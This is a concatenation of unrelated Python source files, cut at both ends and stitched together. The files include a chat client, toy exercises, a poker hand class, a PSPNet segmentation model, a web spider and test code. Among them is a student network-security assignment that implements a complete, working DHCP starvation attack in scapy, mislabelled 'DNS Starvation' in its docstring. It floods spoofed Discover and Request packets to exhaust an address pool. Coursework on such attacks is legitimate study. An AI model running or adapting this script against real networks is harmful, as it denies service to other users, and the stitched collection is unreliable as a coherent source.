if m.Header.Type == M_DATA:
print(m.Data)
else:
time.sleep(1)
def Client():
Message.SendMessage(M_BROKER, M_INIT)
t = threading.Thread(target=ProcessMessages)
t.start()
while True:
Message.SendMessage(M_ALL, M_DATA, input())
Client()
|
"""
Python Version 3.8
Singapore Institute of Technology (SIT)
Information and Communications Technology (Information Security), BEng (Hons)
ICT-2203 Network Security Assignment 1
Author: @ Tan Zhao Yea / 1802992
Academic Year: 2020/2021
Lecturer: Woo Wing Keong
Submission Date: 25th October 2020
This script holds the code to perform DNS Starvation.
> Port Security enabled discourage us to use RandMac() from the same host
> Layer 2 src remains the same, but chaddr at Layer 7 is change to use a RandMac()
> First, perform DHCP Discover Packet
> Then, perform DHCP Request Packet after receiving the DHCP Offer Packet
"""
import logging
import multiprocessing as mp
from scapy.all import *
# UDP Port Number Protocol
SERVER_DHCP_PORT = 67
CLIENT_DHCP_PORT = 68
# Default Configurations
IFACE = conf.iface
BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
META_ADDR = "0.0.0.0"
BROADCAST_IP = "255.255.255.255"
HW = get_if_hwaddr(IFACE)
# DHPC Options
MSG_TYPE = 0
SERVER_ID = 1
DHCP_OFFER = 2
ANS = 1
# Sleep Time
SLEEP_DURATION = 2
# Logging Configuration
LOG_FILE_DIR = os.path.abspath("logs/dhcp_starve.txt")
logging.basicConfig(filename=LOG_FILE_DIR,
filemode='w',
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%d/%m/%Y %I:%M:%S %p')
class DHCPStarvation(object):
def __init__(self, iface, hardware_addr, broadcast_mac, meta_addr, broadcast_ip, random_mac):
self.iface = iface
self.broadcast_mac = broadcast_mac
self.meta_address = meta_addr
self.broadcast_ip = broadcast_ip
# Get HW Address
self.hw = hardware_addr
self.rand_mac = random_mac
def send_dhcp_dis_pkt(self):
""" Creates the DHCP Discover Packet to prepare for DHCP Starvation """
pkt = Ether(src=self.hw, dst=self.broadcast_mac) \
/ IP(src=self.meta_address, dst=self.broadcast_ip) \
/ UDP(sport=CLIENT_DHCP_PORT, dport=SERVER_DHCP_PORT) \
/ BOOTP(chaddr=self.rand_mac) \
/ DHCP(options=[('message-type', 'discover'), 'end'])
sendp(pkt, iface=self.iface, verbose=0)
def craft_dhcp_pkt():
""" Crafting DHCP Discover Packet Starvation Attack """
# Infinite Attack
while True:
logging.info("[*] Crafting DHCP Discover Packet")
random_mac = RandMAC()
packet = DHCPStarvation(iface=IFACE,
hardware_addr=HW,
broadcast_mac=BROADCAST_MAC,
meta_addr=META_ADDR,
broadcast_ip=BROADCAST_IP,
random_mac=random_mac)
logging.info("[*] Sending DHCP Discover Packet ...")
packet.send_dhcp_dis_pkt()
logging.info(f"[*] Sleeping for {SLEEP_DURATION} seconds ...")
time.sleep(SLEEP_DURATION)
def dhcp_pkt_filter(pkt):
"""
Allow only DHCP Packet for processing
:param pkt: Incoming Packet
:return: Boolean (True/False)
"""
try:
if pkt.haslayer(DHCP) and pkt[DHCP].options[MSG_TYPE][ANS] == DHCP_OFFER:
return pkt[UDP].sport == SERVER_DHCP_PORT and pkt[UDP].dport == CLIENT_DHCP_PORT
return False
except:
pass
def send_dhcp_req(pkt):
"""
Sending DHCP Request Packet
:param pkt: Incoming Offer Packet
"""
dhcp_request = Ether(src=HW, dst=pkt[Ether].src) \
/ IP(src=META_ADDR, dst=BROADCAST_IP) \
/ UDP(sport=CLIENT_DHCP_PORT, dport=SERVER_DHCP_PORT) \
/ BOOTP(chaddr=pkt[BOOTP].chaddr) \
/ DHCP(options=[('message-type', 'request'), ('server_id', pkt[DHCP].options[SERVER_ID][ANS]), ('requested_addr', pkt[BOOTP].yiaddr),'end'])
sendp(dhcp_request, iface=IFACE, verbose=0)
logging.info(f"[*] Successfully Starved Address: {pkt[BOOTP].yiaddr}")
def main():
""" Sniffer Function """
sniff(lfilter=dhcp_pkt_filter, prn=send_dhcp_req, iface=IFACE)
if __name__ == '__main__':
p1 = mp.Process(target=main)
p2 = mp.Process(target=craft_dhcp_pkt)
logging.info("[*] Starting Program ...")
p1.start()
p2.start()
|
for i in range(1,3000):
for j in range(1,11):
if i%j != 0:
break
else:
continue
num = 2520
i = 2
while i < 21:
if num%i == 0:
i += 1
else:
num += 1
i = 2
print(num)
|
# Write a Python program to find common items from two lists
def commoninList (list1,list2):
commonEle = []
if len(list1)<len(list2):
for i in range(len(list1)):
if list1[i] in list2:
commonEle.append(list1[i])
else:
print('Nothing in common')
else:
for i in range(len(list2)):
if list2[i] in list1:
commonEle.append(list2[i])
else:
print("Nothing in common")
return commonEle
list1 = [3,4,5,6,7,8]
list2 = [10]
output = commoninList(list1,list2)
print(output)
|
from setuptools import setup
setup(
name='geomap6',
version='6.2.0',
packages=['ml_project', 'ml_project.src', 'ml_project.src.model', 'ml_project.src.model.utils'],
url='',
license='MIT',
author='asokolov',
author_email='aesokolov1975@gmail.com',
description='Geo tools'
)
|
"""
- contains data for a single author
"""
class author( object ):
"""docstring for `uPub_data`."""
def __init__(self, line):
import hashlib
"""assigns values to the object.
INPUT: MD file containing all data; path to image
"""
self.fname = None
self.lname = None
self.contribution = None
self.affiliation = None
self.email = None
self.ORCIDiD = None
self.corresponding_author = False
self.submitting_author = False
self.equal_contribution = False
def show( self ):
"""prints the object as a DICTIONARY
"""
from pprint import pprint as pprint
pprint( self.__dict__ )
def grab_author_data( md_path ):
"""
- grabs all the author data from the md_path
- returns a list of strings that contain all the data
"""
grab_line = False # bool to check if you should grab that particular line
author_data = []
with open( md_path, "r" ) as md_file:
for line in md_file:
if ( "^1Ω^" in line.strip() and "^2^" in line.strip() ) or line.strip() == "**Author Contributions: **":
grab_line = True
elif line.strip() == "![][1]" or line.strip() == "Please select a tag below that best describes your submission":
grab_line = False
if grab_line and len( line.strip() ) != 0:
author_data.append( line.strip() )
return( author_data )
def format_author_data( list_of_raw_author_data ):
"""
- gets the list of string of raw author data
- returns dictionary of formatted author data
"""
from pprint import pprint as pprint
# pprint( list_of_raw_author_data )
list_names = list_of_raw_author_data[0].split(", ")
affiliations = list_of_raw_author_data[ 1 : list_of_raw_author_data.index("> ^Ω^ To whom correspondence should be addressed") ]
contributions = list_of_raw_author_data[ list_of_raw_author_data.index("**Author Contributions: **")+1 :]
author_list = []
for person in list_names:
corresponding_author = False
auth = author( person )
if "Ω" in person:
auth.corresponding_author = True
if list_names.index( person ) == 0:
auth.submitting_author = True
temp = person.replace( "Ω", "" )
num = int(temp[-2])
full_name = temp[:-3]
auth.fname = " ".join(full_name.split()[:-1])
auth.lname = full_name.split()[-1]
auth.affiliation = affiliations[num-1]
auth.contribution = author.convert_contributions_to_dict(contributions)[full_name]
author_list.append( auth )
return( author_list )
def convert_contributions_to_dict( contributions ):
"""
- converts the list of onctibutions to a dictionary of contributions for each author
"""
author_line = True
contribution_line = False
author_contribution = {}
temp = "---||---".join( contributions )
temp = temp.replace( "---||---- ", ";" )
associated_contributions = temp.split("---||---")
for item in associated_contributions:
temp = item.split(";")
contris = temp[1:]
list_auths = temp[0].split(", ")
for auth in list_auths:
author_contribution[auth] = contris
return( author_contribution )
|
class PokerHand:
"""
models a poker hand
"""
def __init__(self, hand_list=None):
if hand_list is None:
hand_list = []
self.__hand = hand_list
def get_hand(self):
"""
getter method for hand(list of cards)
:return: hand
"""
return self.__hand
def add_card(self, card):
"""
append a card to a hand
:param card: card being added
:return: None
"""
self.__hand.append( card )
def get_ith_card(self, index):
if 0 <= index < len( self.get_hand() ):
return self.get_hand()[index]
else:
return None
def deal_poker_hand(self, deck):
"""
this function adds 5 cards from the deck to the hand
:param deck: deck that cards are being drawn from
:return:
"""
for i in range( 5 ):
self.__hand.append( deck.deal() )
def what_is_it(self):
"""
evaluates the hand
:return: index[0] - hand type index[1] - pair values index[2]
4 for flush pairs = [] (empty list) - if there are no pairs list of
3 for 2pair pairs = [rank1,] - if 1 pair highcard values
2 for pair pairs = [rank1, rank2] - if 2 pairs (all cards not in a pair)
1 for highcard
"""
pairs = []
highcards = []
ranks = sorted( [card.get_rank() for card in self.get_hand()] )
suits = [card.get_suit() for card in self.get_hand()]
for r in set( ranks ):
if ranks.count( r ) == 4:
pairs.append( r )
pairs.append( r )
if ranks.count( r ) == 3:
pairs.append( r )
if ranks.count( r ) == 2:
pairs.append( r )
else:
highcards.append( r )
if all( s == suits[0] for s in suits ):
return 4, pairs, highcards
if len( pairs ) == 2:
return 3, pairs, highcards
if len( pairs ) == 1:
return 2, pairs, highcards
else:
return 1, pairs, highcards
def compare_to(self, other_hand):
"""
Determines which of two poker hands is worth more. Returns an int
which is either positive, negative, or zero depending on the comparison.
:param self: The first hand to compare
:param other_hand: The second hand to compare
:return: a negative number if self is worth LESS than other_hand,
zero if they are worth the SAME (a tie), and a positive number if
self is worth MORE than other_hand
"""
this_hand_type = self.what_is_it()[0]
other_hand_type = other_hand.what_is_it()[0]
this_hand_pairs = sorted( self.what_is_it()[1], reverse=True )
other_hand_pairs = sorted( other_hand.what_is_it()[1], reverse=True )
this_hand_highcards = sorted( self.what_is_it()[2], reverse=True )
other_hand_highcards = sorted( other_hand.what_is_it()[2], reverse=True )
if this_hand_type > other_hand_type: # if this hand is a higher type
return 1
if this_hand_type < other_hand_type: # if this hand is a lower type
return -1
if this_hand_type == other_hand_type: # if same hand type
if len( this_hand_pairs ) != 0: # makes sure there are pairs
if self.compare_to_helper( this_hand_pairs, other_hand_pairs ) == 0: # if pairs tie
return self.compare_to_helper( this_hand_highcards,
other_hand_highcards ) # compare highcards result
else:
return self.compare_to_helper( this_hand_pairs,
other_hand_pairs ) # compare pairs result
else: # if no pairs then just compare the highcards
return self.compare_to_helper( this_hand_highcards,
other_hand_highcards ) # compare highcards result
def compare_to_helper(self, this_hand_list, other_hand_list):
"""
:param this_hand_list: sorted list of ranks from 'this' hand
:param other_hand_list: sorted list of ranks from other hand
:return: 1 if this_hand_list contains first instance of a greater rank,
-1 if other_hand_list contains first instance of a greater rank,
and 0 if all ranks are the same
"""
for rank1, rank2 in zip( this_hand_list, other_hand_list ):
if rank1 > rank2:
return 1
if rank1 < rank2:
return -1
if rank1 == rank2:
continue
return 0
def __str__(self):
"""
prints all cards in hand
:return: none
"""
string = ""
for card in self.get_hand():
string += str( card ) + "\n"
return string
|
import os
from nltk import sent_tokenize
from nltk import word_tokenize
class SentenceIterator(object):
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
for sent in sent_tokenize(open(os.path.join(self.dirname, fname),'r').read()):
yield word_tokenize(sent)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from base.segbase import SegBaseModel
class PSPNet(SegBaseModel):
def __init__(self, nclass, backbone='resnet50', pretrained_base=True, **kwargs):
super(PSPNet, self).__init__(nclass, backbone, pretrained_base=pretrained_base, **kwargs)
self.head = _PSPHead(nclass, **kwargs)
self.__setattr__('exclusive', ['head'])
def forward(self, x):
size = x.size()[2:]
_,_, c3, c4 = self.base_forward(x)
outputs = []
x = self.head(c4)
# upsampling to the same size as the input image
x = F.interpolate(x, size, mode='bilinear', align_corners=True)
outputs.append(x)
return tuple(outputs)
class _PSPHead(nn.Module):
def __init__(self, nclass, norm_layer=nn.BatchNorm2d, norm_kwargs=None, **kwargs):
super(_PSPHead, self).__init__()
self.psp = _PyramidPooling(2048, norm_layer=norm_layer, norm_kwargs=norm_kwargs)
self.block = nn.Sequential(
nn.Conv2d(4096, 512, 3, padding=1, bias=False),
norm_layer(512, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True),
nn.Dropout(0.1),
nn.Conv2d(512, nclass, 1)
)
def forward(self, x):
x = self.psp(x)
return self.block(x)
class _PyramidPooling(nn.Module):
def __init__(self, in_channels, **kwargs):
super(_PyramidPooling, self).__init__()
out_channels = int(in_channels / 4)
self.avgpool1 = nn.AdaptiveAvgPool2d(1)
self.avgpool2 = nn.AdaptiveAvgPool2d(2)
self.avgpool3 = nn.AdaptiveAvgPool2d(3)
self.avgpool4 = nn.AdaptiveAvgPool2d(6)
self.conv1 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv2 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv3 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv4 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
def forward(self, x):
size = x.size()[2:]
feat1 = F.interpolate(self.conv1(self.avgpool1(x)), size, mode='bilinear', align_corners=True)
feat2 = F.interpolate(self.conv2(self.avgpool2(x)), size, mode='bilinear', align_corners=True)
feat3 = F.interpolate(self.conv3(self.avgpool3(x)), size, mode='bilinear', align_corners=True)
feat4 = F.interpolate(self.conv4(self.avgpool4(x)), size, mode='bilinear', align_corners=True)
return torch.cat([x, feat1, feat2, feat3, feat4], dim=1)
def _PSP1x1Conv(in_channels, out_channels, norm_layer, norm_kwargs):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
if __name__ == "__main__":
net = PSPNet(20)
print(net)
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.http import Request
class Pic169bbSpider(scrapy.Spider):
name = "pic_169bb"
allowed_domains = ["169bb.com","169ku.com"]
start_urls = ['http://169bb.com/']
def parse(self, response):
url_data = response.xpath("/html/body/div[@class='header']/div[@class='hd_nav']/div[@class='w1000']//a/@href").extract()
xiyang_url_data = url_data[4]
yield(Request(url=xiyang_url_data, callback=self.next))
def next(sef, response):
page_title_list = response.xpath("/html/body//div[@class='w1000 box03']/ul[@class='product01']//li/a/@alt").extract()
page_url_list = response.xpath("/html/body//div[@class='w1000 box03']/ul[@class='product01']//li/a/@href").extract()
page_num = response.xpath("//span[@class='pageinfo']//strong/text()").extract()
print(response.text)
|
#!/usr/bin/env python
import time, unittest, os, sys
from selenium import webdriver
from main.activity.desktop_v3.activity_login import *
from main.activity.desktop_v3.activity_talk_product import *
from main.page.desktop_v3.shop.pe_shop import *
from main.page.desktop_v3.product.pe_product import *
from main.page.desktop_v3.product.pe_talk_product import *
from utils.function.setup import *
from utils.lib.user_data import *
from random import randint
class TestInputTalk(unittest.TestCase):
talk_message = 'asdfghjklmnbvcxzwertyuii #' + ' http://cumiiii1' + str(randint(0,9999)) + '.com'
dict = {
"site" : "live",
"end_to_end" : True, #True: the default to test Talk with end-to-end process, False: For sending multiple talk
"loop" : 3, #Only used for multiple talk
"sender" : user5,
"receiver" : user6
}
def setUp(self):
self.driver = tsetup('phantomjs')
self.talk = talkProductActivity(self.driver)
self.talk.set_parameter(self.dict)
def test_input_talk(self):
print('==========================')
print('TEST: SEND TALK')
print('==========================')
self.talk.set_parameter(self.dict) #initialization
self.talk.test_input_talk(self.driver, self.dict['site'], self.talk_message)
def tearDown(self):
print("Testing akan selesai dalam beberapa saat..")
time.sleep(5)
self.driver.quit()
#test
# main
if(__name__ == "__main__"):
unittest.main()
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:lr_model.py
# @Author: Michael.liu
# @Date:2020/6/17 14:51
# @Desc: this code is ....
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import StandardScaler
from sklearn.externals import joblib
class LrModel(object):
train_df = None
test_df = None
vali_df = None
model = None
def __init__(self, trainfile, testfile, valifile):
self.train_file = trainfile
self.test_file = testfile
self.vali_file = valifile
def load_train_data(self, names):
self.train_df = pd.read_csv(self.train_file, header=0, sep=',')
def load_vali_data(self, names):
self.vali_df = pd.read_csv(self.vali_file,header=0, sep=',')
def load_test_data(self, names):
self.test_df = pd.read_csv(self.test_file, header=0, sep=',')
def train(self, feature_head, target_head):
'''
:param train_df: dataframe of train data
:param vali_df: dataframe of valid data
:param test_df: dataframe of test data
:param feature_head: list of features names for model
:param target_head: str of target name for model
:return:
'''
#print(self.train_df)
#print(feature_head)
x_train = self.train_df[feature_head]
y_train = self.train_df[target_head]
# 暂时没有用到验证集
# todo:可以random 训练和验证数据集
# x_vali = vali_df[feature_head]
# y_vali = vali_df[target_head]
x_test = self.test_df[feature_head]
y_test = self.test_df[target_head]
lr = LogisticRegression()
lr.fit(x_train, y_train)
print('Accuracy of LR Classifier:%f' % lr.score(x_test, y_test))
joblib.dump(lr, 'gen_lr.pkl')
self.model = lr
# 加载模型并进行预测
def infer(self, feature_head, target_head, model_path=None):
'''
:param feature_head: list names of features for model
:param target_head: string name of target for model
:param model_path : model path for loading model (model must have same feature head and target head with valid data)
:return:
'''
if model_path != None:
self.model = joblib.load(model_path)
x_vali = self.vali_df[feature_head]
y_vali = self.vali_df[target_head]
print('Accuracy of LR Classifier:%f' % self.model.score(x_vali, y_vali))
|
#!/usr/bin/python -tt
#
# Marko Saukko <marko.saukko@cybercom.com>
#
# Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from pykickstart.commands.partition import *
class MeeGo_PartData(FC4_PartData):
removedKeywords = FC4_PartData.removedKeywords
removedAttrs = FC4_PartData.removedAttrs
def __init__(self, *args, **kwargs):
FC4_PartData.__init__(self, *args, **kwargs)
self.deleteRemovedAttrs()
self.align = kwargs.get("align", None)
def _getArgsAsStr(self):
retval = FC4_PartData._getArgsAsStr(self)
if self.align:
retval += " --align"
return retval
class MeeGo_Partition(FC4_Partition):
removedKeywords = FC4_Partition.removedKeywords
removedAttrs = FC4_Partition.removedAttrs
def _getParser(self):
op = FC4_Partition._getParser(self)
# The alignment value is given in kBytes. e.g., value 8 means that
# the partition is aligned to start from 8096 byte boundary.
op.add_option("--align", type="int", action="store", dest="align",
default=None)
return op
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.util.contextutil import temporary_dir
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class CleanAllTest(PantsRunIntegrationTest):
def test_clean_all_on_wrong_dir(self):
with temporary_dir() as workdir:
self.assert_failure(self.run_pants_with_workdir(["clean-all"], workdir))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.